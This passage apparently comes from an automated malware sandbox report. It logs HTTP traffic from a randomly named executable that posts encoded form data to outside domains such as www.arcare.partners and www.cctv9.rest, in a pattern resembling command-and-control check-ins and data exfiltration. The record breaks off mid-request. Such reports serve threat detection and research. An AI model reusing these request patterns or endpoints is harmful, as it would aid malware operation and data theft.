                                                                                  Data Ascii: a9P;10 Da!(Xhd'KDwA-y?]Y.%Y7p.~I4{a 'fI9MMVJy G m`8;Bu)Y()TR?[<'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.54998145.150.55.15801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:34.196352959 CEST545OUTGET /hi08/?v2x4if=+COrnfoiLIYpHID8Jdn5STS8mn+dG0IOSj3c7V4IL3MTuwRxXjxT14sXhAjF0/r/wZdWh4U9LEdUgjY8Z9goLxBnq4opY1y2hZAtwcDdsNM1Zv/DVnaDD1dNLgPD6a//aQ==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.983743.vin
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:05:35.015273094 CEST733INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:05:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.5499833.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:40.066205025 CEST804OUTPOST /6deb/ HTTP/1.1
                                                                                  Host: www.arcare.partners
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.arcare.partners
                                                                                  Referer: http://www.arcare.partners/6deb/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 53 70 7a 35 53 5a 62 31 4c 7a 2b 49 6c 6d 53 39 38 75 4e 4b 4c 77 6e 51 79 70 58 30 71 39 49 77 49 4b 4e 47 79 4d 37 6a 34 6b 31 6a 38 76 6a 38 52 36 54 54 76 64 2f 5a 59 71 69 74 56 68 50 6a 6a 6d 47 65 72 49 4b 73 74 5a 6d 6e 34 48 6e 6c 68 41 4f 36 69 33 2f 46 59 55 55 75 45 33 6c 56 75 4a 2b 6b 59 59 56 6b 72 54 5a 50 2f 53 44 78 70 37 48 5a 2f 41 31 69 6e 75 51 37 38 62 59 4c 41 5a 54 4a 5a 2f 48 59 73 68 79 36 35 79 33 6a 52 6a 72 50 4f 39 36 52 61 57 4e 57 4f 70 54 2b 32 76 4b 6f 56 45 49 61 57 65 5a 71 6c 43 35 41 6e 76 64 4a 6c 49 64 6b 76 7a 55 67 32 43 52 73 35 4e 51 32 44 65 73 3d
                                                                                  Data Ascii: v2x4if=Spz5SZb1Lz+IlmS98uNKLwnQypX0q9IwIKNGyM7j4k1j8vj8R6TTvd/ZYqitVhPjjmGerIKstZmn4HnlhAO6i3/FYUUuE3lVuJ+kYYVkrTZP/SDxp7HZ/A1inuQ78bYLAZTJZ/HYshy65y3jRjrPO96RaWNWOpT+2vKoVEIaWeZqlC5AnvdJlIdkvzUg2CRs5NQ2Des=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.5499843.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:42.607131958 CEST824OUTPOST /6deb/ HTTP/1.1
                                                                                  Host: www.arcare.partners
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.arcare.partners
                                                                                  Referer: http://www.arcare.partners/6deb/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 53 70 7a 35 53 5a 62 31 4c 7a 2b 49 6a 47 4f 39 7a 74 56 4b 44 77 6e 66 72 70 58 30 2f 74 49 30 49 4b 52 47 79 49 69 75 34 58 42 6a 37 4f 54 38 51 2b 2f 54 68 39 2f 5a 4d 36 69 78 61 42 50 6b 6a 6d 61 57 72 4b 4f 73 74 64 4f 6e 34 43 4c 6c 67 78 4f 35 6b 6e 2f 4c 51 30 55 67 4b 58 6c 56 75 4a 2b 6b 59 5a 77 7a 72 54 68 50 2f 6a 7a 78 70 65 37 65 67 77 31 6a 6b 75 51 37 34 62 59 48 41 5a 54 2f 5a 37 66 69 73 6a 36 36 35 7a 48 6a 57 79 72 4f 45 39 37 61 65 57 4d 47 64 6f 43 37 38 5a 61 65 51 69 42 61 43 4f 5a 4a 67 30 55 71 39 4e 56 68 32 6f 78 63 2f 67 63 58 6e 79 77 46 6a 75 41 47 64 4a 37 6e 76 42 33 51 66 35 62 62 4e 75 79 54 62 65 33 69 50 57 59 30
                                                                                  Data Ascii: v2x4if=Spz5SZb1Lz+IjGO9ztVKDwnfrpX0/tI0IKRGyIiu4XBj7OT8Q+/Th9/ZM6ixaBPkjmaWrKOstdOn4CLlgxO5kn/LQ0UgKXlVuJ+kYZwzrThP/jzxpe7egw1jkuQ74bYHAZT/Z7fisj665zHjWyrOE97aeWMGdoC78ZaeQiBaCOZJg0Uq9NVh2oxc/gcXnywFjuAGdJ7nvB3Qf5bbNuyTbe3iPWY0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.5499853.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:45.151705027 CEST1841OUTPOST /6deb/ HTTP/1.1
                                                                                  Host: www.arcare.partners
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.arcare.partners
                                                                                  Referer: http://www.arcare.partners/6deb/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 53 70 7a 35 53 5a 62 31 4c 7a 2b 49 6a 47 4f 39 7a 74 56 4b 44 77 6e 66 72 70 58 30 2f 74 49 30 49 4b 52 47 79 49 69 75 34 58 5a 6a 37 38 62 38 53 5a 72 54 69 39 2f 5a 54 4b 69 79 61 42 4f 68 6a 6d 53 53 72 4b 54 62 74 66 32 6e 37 67 44 6c 70 6c 69 35 71 6e 2f 4c 63 55 55 74 45 33 6c 41 75 4a 75 67 59 59 41 7a 72 54 68 50 2f 68 72 78 72 4c 48 65 69 77 31 69 6e 75 51 42 38 62 59 6a 41 5a 4c 76 5a 37 4b 56 73 53 61 36 35 51 76 6a 51 41 7a 4f 4d 39 37 59 54 32 4e 44 64 6f 4f 77 38 64 43 6f 51 69 64 67 43 4d 5a 4a 6a 53 5a 6a 69 4f 31 49 31 70 4e 5a 35 7a 4e 32 6e 53 34 59 73 4e 70 32 58 4a 72 63 79 53 2f 62 53 38 37 4a 48 76 48 43 46 35 2b 34 49 52 39 71 67 52 50 37 6f 4c 6b 31 43 50 72 62 78 6a 37 39 5a 50 70 77 31 4d 39 4b 7a 32 64 2f 58 56 39 34 79 74 77 79 6a 55 43 2b 6b 44 51 2b 30 6c 59 38 64 41 63 35 39 7a 41 50 52 31 39 52 67 7a 57 71 41 59 36 64 34 49 65 31 42 6c 48 78 41 55 70 36 71 6d 49 44 38 47 50 53 54 31 42 79 7a 77 41 74 46 4b 4a 4a 4b 39 2b 59 77 61 38 70 77 4d 50 [TRUNCATED]
                                                                                  Data Ascii: v2x4if=Spz5SZb1Lz+IjGO9ztVKDwnfrpX0/tI0IKRGyIiu4XZj78b8SZrTi9/ZTKiyaBOhjmSSrKTbtf2n7gDlpli5qn/LcUUtE3lAuJugYYAzrThP/hrxrLHeiw1inuQB8bYjAZLvZ7KVsSa65QvjQAzOM97YT2NDdoOw8dCoQidgCMZJjSZjiO1I1pNZ5zN2nS4YsNp2XJrcyS/bS87JHvHCF5+4IR9qgRP7oLk1CPrbxj79ZPpw1M9Kz2d/XV94ytwyjUC+kDQ+0lY8dAc59zAPR19RgzWqAY6d4Ie1BlHxAUp6qmID8GPST1ByzwAtFKJJK9+Ywa8pwMPYiTlyjEiAZZfavHayeNt/Rjh4BJcaQNMCncubIqeNrGQgaroKjyXig3/Xb0zYJq/VrUsfyMcNYfyHJzWUaSXaiQaC6SwOs2rshydDVRkQHq5S6mCLkQPncM1I0WCP9QmOAH2a1hTtpvtH1Y9jApHE9sLP/AeKj1BWff5zsvc9BMzsmsa17xd+trwepXobx5r4JkjlPT2RVOfiwLVH2tTQAQZQFkki9tGaMVqjWF75ps1avUFZZfN3XJHN3b/U+hZRCz5Diaqf0R3q48VBfW+DCot/W3g+yQfnp0l2a7wkPth6t97pSOrus4I7nLLWCcPZNUzAPCP4S13qtr7McOp2WFM92IG/BuoVImmk77qzGBl3FuMJ4eXUlTHfqBFK9ak5iOC9GOdqahkbakyVjD/0XW21ejq23SIOUDLR/efP4eVbaM5heSumgoYsysH01JEda5ZtoaAWzfNqKgvgknDs7PZhULvK8HdmFD6QgM9kFfz2Sfk+2J64Fj2O/OGSJai4rzO6QfKdAIsi7OOtK9lknDLfrg7bO/EBM6uRiGkTT7YBSDld6jOHu04fF1/zEV65q3UV782lWLXoLfADgW9rSf4vKAmhNDRiST6eH5gWcJClNkSGX5JJPRxmLflVzFd8Gw1Lz6zDCjs7ZYZDO9NOQQXG0yFLFwajg [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.5499863.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:47.709511995 CEST550OUTGET /6deb/?bTU8=BDEpwP48zFO0YTL&v2x4if=frbZRuXmKU61niiN8d5+MgPC6Pfs/vAzOJxU/pKZoFND5OO3a5aIko3iRqTcSjrrqUfDpbGVv4TG7n3U9jbk61XITHwlKVRh/+b6X5sz4nwuxRz0po2o/GoElcEwj6ZdbQ== HTTP/1.1
                                                                                  Host: www.arcare.partners
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:05:51.102168083 CEST415INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Mon, 07 Oct 2024 13:05:51 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 54 55 38 3d 42 44 45 70 77 50 34 38 7a 46 4f 30 59 54 4c 26 76 32 78 34 69 66 3d 66 72 62 5a 52 75 58 6d 4b 55 36 31 6e 69 69 4e 38 64 35 2b 4d 67 50 43 36 50 66 73 2f 76 41 7a 4f 4a 78 55 2f 70 4b 5a 6f 46 4e 44 35 4f 4f 33 61 35 61 49 6b 6f 33 69 52 71 54 63 53 6a 72 72 71 55 66 44 70 62 47 56 76 34 54 47 37 6e 33 55 39 6a 62 6b 36 31 58 49 54 48 77 6c 4b 56 52 68 2f 2b 62 36 58 35 73 7a 34 6e 77 75 78 52 7a 30 70 6f 32 6f 2f 47 6f 45 6c 63 45 77 6a 36 5a 64 62 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bTU8=BDEpwP48zFO0YTL&v2x4if=frbZRuXmKU61niiN8d5+MgPC6Pfs/vAzOJxU/pKZoFND5OO3a5aIko3iRqTcSjrrqUfDpbGVv4TG7n3U9jbk61XITHwlKVRh/+b6X5sz4nwuxRz0po2o/GoElcEwj6ZdbQ=="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.549987114.134.188.182801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:56.185359955 CEST789OUTPOST /n990/ HTTP/1.1
                                                                                  Host: www.cctv9.rest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.cctv9.rest
                                                                                  Referer: http://www.cctv9.rest/n990/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 4c 7a 67 34 52 39 54 57 51 6a 7a 66 44 38 6b 49 6d 58 45 4f 72 6f 71 68 45 4e 36 68 31 4a 45 6b 63 66 68 31 63 32 42 6a 46 39 6f 39 63 56 57 78 75 43 32 36 4a 2f 45 65 77 65 63 4f 6f 71 6c 42 38 46 30 46 34 68 31 74 54 6d 32 53 4a 46 42 47 68 64 5a 6b 6f 47 79 6f 73 4b 43 5a 2b 4e 71 76 76 4b 33 71 55 32 4f 6e 38 36 6b 52 31 76 33 55 36 53 51 57 57 37 33 4f 74 78 4d 6c 35 53 66 76 65 53 6c 6d 47 78 53 63 50 36 77 57 4a 71 61 75 4c 65 4e 4f 35 62 71 39 41 30 66 77 43 57 65 6e 47 52 48 70 66 73 6d 2b 44 6a 30 63 6a 55 69 79 68 59 69 56 6c 30 53 42 68 67 71 6b 62 66 59 47 48 47 46 63 47 64 6b 3d
                                                                                  Data Ascii: v2x4if=Lzg4R9TWQjzfD8kImXEOroqhEN6h1JEkcfh1c2BjF9o9cVWxuC26J/EewecOoqlB8F0F4h1tTm2SJFBGhdZkoGyosKCZ+NqvvK3qU2On86kR1v3U6SQWW73OtxMl5SfveSlmGxScP6wWJqauLeNO5bq9A0fwCWenGRHpfsm+Dj0cjUiyhYiVl0SBhgqkbfYGHGFcGdk=
                                                                                  Oct 7, 2024 15:05:57.263739109 CEST720INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Mon, 07 Oct 2024 13:05:56 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 555
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                  Oct 7, 2024 15:05:57.263992071 CEST720INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Mon, 07 Oct 2024 13:05:56 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 555
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.549988114.134.188.182801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:05:58.730106115 CEST809OUTPOST /n990/ HTTP/1.1
                                                                                  Host: www.cctv9.rest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.cctv9.rest
                                                                                  Referer: http://www.cctv9.rest/n990/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 4c 7a 67 34 52 39 54 57 51 6a 7a 66 44 66 38 49 71 55 63 4f 74 49 71 2b 49 74 36 68 2f 70 45 67 63 66 6c 31 63 30 74 56 43 50 4d 39 62 31 6d 78 76 41 4f 36 49 2f 45 65 36 2b 63 50 73 71 6c 61 38 46 35 34 34 6c 78 74 54 6d 69 53 4a 41 39 47 68 76 78 6c 70 57 79 71 6c 71 43 62 7a 74 71 76 76 4b 33 71 55 32 61 4e 38 37 41 52 31 2f 48 55 34 33 38 5a 49 4c 33 4a 37 42 4d 6c 39 53 66 72 65 53 6c 2b 47 31 61 69 50 38 30 57 4a 6f 53 75 61 72 68 4e 69 4c 71 37 66 6b 66 6a 54 48 72 5a 4b 54 48 30 56 61 79 39 59 53 6f 69 72 43 50 59 37 36 71 39 32 55 2b 35 78 7a 69 54 4b 76 35 76 64 6c 56 73 59 4b 77 45 74 2b 4c 52 71 70 39 6c 74 64 41 4e 74 74 50 46 73 46 6a 6f
                                                                                  Data Ascii: v2x4if=Lzg4R9TWQjzfDf8IqUcOtIq+It6h/pEgcfl1c0tVCPM9b1mxvAO6I/Ee6+cPsqla8F544lxtTmiSJA9GhvxlpWyqlqCbztqvvK3qU2aN87AR1/HU438ZIL3J7BMl9SfreSl+G1aiP80WJoSuarhNiLq7fkfjTHrZKTH0Vay9YSoirCPY76q92U+5xziTKv5vdlVsYKwEt+LRqp9ltdANttPFsFjo
                                                                                  Oct 7, 2024 15:05:59.555865049 CEST720INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.26.1
                                                                                  Date: Mon, 07 Oct 2024 13:05:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 555
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.549989114.134.188.182801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:01.280925035 CEST1826OUTPOST /n990/ HTTP/1.1
                                                                                  Host: www.cctv9.rest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.cctv9.rest
                                                                                  Referer: http://www.cctv9.rest/n990/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
